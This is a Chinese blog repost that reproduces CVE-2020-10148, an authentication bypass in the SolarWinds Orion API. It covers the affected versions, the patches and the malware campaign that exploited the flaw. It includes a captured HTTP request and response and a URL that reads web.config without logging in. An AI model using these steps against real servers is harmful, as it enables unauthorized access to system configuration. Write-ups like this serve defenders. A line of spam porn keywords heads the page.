日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

SolarWinds Orion API 远程代码执行漏洞(CVE-2020-10148)

發(fā)布時(shí)間:2024/1/1 编程问答 33 豆豆
生活随笔 收集整理的這篇文章主要介紹了 SolarWinds Orion API 远程代码执行漏洞(CVE-2020-10148) 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

SolarWinds Orion API 遠(yuǎn)程代碼執(zhí)行漏洞

(CVE-2020-10148)

?

一、漏洞概況

SolarWinds Orion API 嵌入在 Orion Core 中,被用于與所有 SolarWinds Orion Platform 產(chǎn)品進(jìn)行接口。通過在URI請求的Request.PathInfo 部分中包含特定參數(shù),可以繞過 API 身份驗(yàn)證,這可能允許攻擊者執(zhí)行未經(jīng)身份驗(yàn)證的 API 命令。如果攻擊者將WebResource.adx,scriptResource.adx,i18n.ashx 或 Skipi18n 的 PathInfo 參數(shù)附加到對 SolarWinds Orion 服務(wù)器的請求,SolarWinds 可能會設(shè)置 SkipAuthorization 標(biāo)志,該標(biāo)志可能允許處理API請求無需身份驗(yàn)證。

攻擊者可利用該漏洞遠(yuǎn)程執(zhí)行任意代碼,有專業(yè)黑客組織利用該漏洞投遞代號為'SUPERNOVA'的惡意程序。

二、漏洞影響范圍

影響版本:

SolarWinds Orion 2020.2.1 HF 2 及 2019.4 HF 6之前的版本

安全版本:

SolarWinds Orion 2019.4 HF 6(2020年12月14日發(fā)布)

SolarWinds Orion 2020.2.1 HF 2(發(fā)布于2020年12月15日)

SolarWinds Orion 2019.2 SUPERNOVA補(bǔ)丁(2020年12月23日發(fā)布)

SolarWinds Orion 2018.4 SUPERNOVA補(bǔ)丁(2020年12月23日發(fā)布)

SolarWinds Orion 2018.2 SUPERNOVA補(bǔ)丁(2020年12月23日發(fā)布)

三、漏洞復(fù)現(xiàn):

訪問/Orion/invalid.aspx.js 路徑,截取請求頭中Location中data獲取

Location:/Orion/invalid.aspx.js.i18n.ashx?l=en-us&v=43005.14.L

GET/Orion/invalid.aspx.jsHTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/css,*/*;q=0.1Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://127.0.0.1/Orion/Login.aspx?ReturnUrl=%2fCookie: ASP.NET_SessionId=p5yxzzumyllsfprttbkexo4u; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE

response

HTTP/1.1404Not FoundCache-Control: no-cachePragma: no-cacheExpires: -1Location: /Orion/invalid.aspx.js.i18n.ashx?l=en-us&v=43005.14.LServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Same-Domain: 1X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockDate: Wed, 30 Dec 2020 01:55:43 GMTConnection: closeContent-Length: 0

將 .i18n.ashx?l=en-US&v=43005.14.L攜帶到下個(gè)訪問路徑,從而繞過身份認(rèn)證。這里訪問的是 web.config文件。

直接訪問也行:

http://127.0.0.1/web.config.i18n.ashx?l=en-us&v=43005.14.L

參考:

https://nosec.org/home/detail/4630.html

免責(zé)聲明:本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險(xiǎn)自負(fù)!

轉(zhuǎn)載聲明:著作權(quán)歸作者所有。商業(yè)轉(zhuǎn)載請聯(lián)系作者獲得授權(quán),非商業(yè)轉(zhuǎn)載請注明出處。

訂閱查看更多復(fù)現(xiàn)文章、學(xué)習(xí)筆記

thelostworld

安全路上,與你并肩前行!!!!

個(gè)人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

個(gè)人簡書:https://www.jianshu.com/u/bf0e38a8d400

個(gè)人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

個(gè)人博客園:https://www.cnblogs.com/thelostworld/

FREEBUF主頁:https://www.freebuf.com/author/thelostworld?type=article

歡迎添加本公眾號作者微信交流,添加時(shí)備注一下“公眾號”

?

總結(jié)

以上是生活随笔為你收集整理的SolarWinds Orion API 远程代码执行漏洞(CVE-2020-10148)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。